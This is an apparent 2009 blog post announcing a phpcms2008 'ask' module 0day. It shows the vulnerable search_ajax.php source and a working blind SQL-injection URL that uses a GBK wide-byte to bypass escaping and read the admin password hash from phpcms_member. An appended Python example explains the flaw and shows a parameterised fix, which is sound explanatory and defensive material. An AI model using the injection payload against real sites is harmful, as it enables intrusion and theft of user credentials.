
phpcms2008 ask 0day

March 20, 2009, admin

Affected software: phpcms2008 gbk

Vulnerable file: ask/search_ajax.php

<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
// On non-UTF-8 builds (e.g. gbk) the search keyword $q is converted to UTF-8 here
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
    // $q is interpolated directly into the LIKE clause
    $where = " title LIKE '%$q%' AND status = 5";
}
else
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);

foreach($infos as $key=>$val)
{
    // Highlight the keyword in each matching title
    $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
    $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
    $info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
From http://www.nukeblog.cn/article/125.htm
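
Added example, not part of the original post or of phpcms: a Python model of why the iconv() call in the file above leaves the quote after %E6 unescaped on the gbk build, next to a hardened lookup that transcodes first and binds the keyword as a parameter. It assumes $q reaches search_ajax.php already backslash-escaped as raw GBK bytes (the post does not show common.inc.php); the helper names, the sample rows and the SQLite stand-in for the MySQL table are constructed.

```python
import sqlite3

def addslashes(raw: bytes) -> bytes:
    # Charset-unaware escaping in the style of PHP addslashes() (NUL handling omitted).
    return b"".join(b"\\" + bytes([b]) if b in b"'\"\\" else bytes([b]) for b in raw)

def vulnerable_where(raw_q: bytes) -> str:
    # Assumed order: bytes are escaped first, then transcoded GBK -> UTF-8,
    # as iconv(CHARSET, 'utf-8', $q) does in search_ajax.php.
    q = addslashes(raw_q).decode("gbk")
    return f" title LIKE '%{q}%' AND status = 5"

def unescaped_quotes(sql: str) -> int:
    # Count single quotes not preceded by a backslash; a safe clause has exactly 2.
    count, i = 0, 0
    while i < len(sql):
        if sql[i] == "\\":
            i += 2
            continue
        count += sql[i] == "'"
        i += 1
    return count

def make_db() -> sqlite3.Connection:
    # Constructed sample rows; SQLite stands in for the MySQL table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ask (askid INTEGER PRIMARY KEY, title TEXT, status INTEGER)")
    db.executemany("INSERT INTO ask (title, status) VALUES (?, ?)",
                   [("it's a test", 5), ("it's hidden", 0), ("plain", 5)])
    return db

def hardened_search(raw_q: bytes, db: sqlite3.Connection) -> list:
    # Transcode first and reject malformed GBK, then bind the keyword as data.
    try:
        q = raw_q.decode("gbk")
    except UnicodeDecodeError:
        return []
    sql = "SELECT title FROM ask WHERE title LIKE ? AND status = 5 ORDER BY askid DESC LIMIT 10"
    return [row[0] for row in db.execute(sql, (f"%{q}%",))]

if __name__ == "__main__":
    for raw in (b"s'", b"s\xe6'"):  # constructed keywords: ASCII quote, and 0xE6 + quote
        where = vulnerable_where(raw)
        print(raw, "->", repr(where), "unescaped quotes:", unescaped_quotes(where))
    print(hardened_search(b"t's", make_db()), hardened_search(b"s\xe6'", make_db()))
```

In the second keyword the escaping backslash (0x5C) becomes the trail byte of a GBK character starting with 0xE6, so after transcoding the quote stands alone and the clause has three unescaped quotes instead of two.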
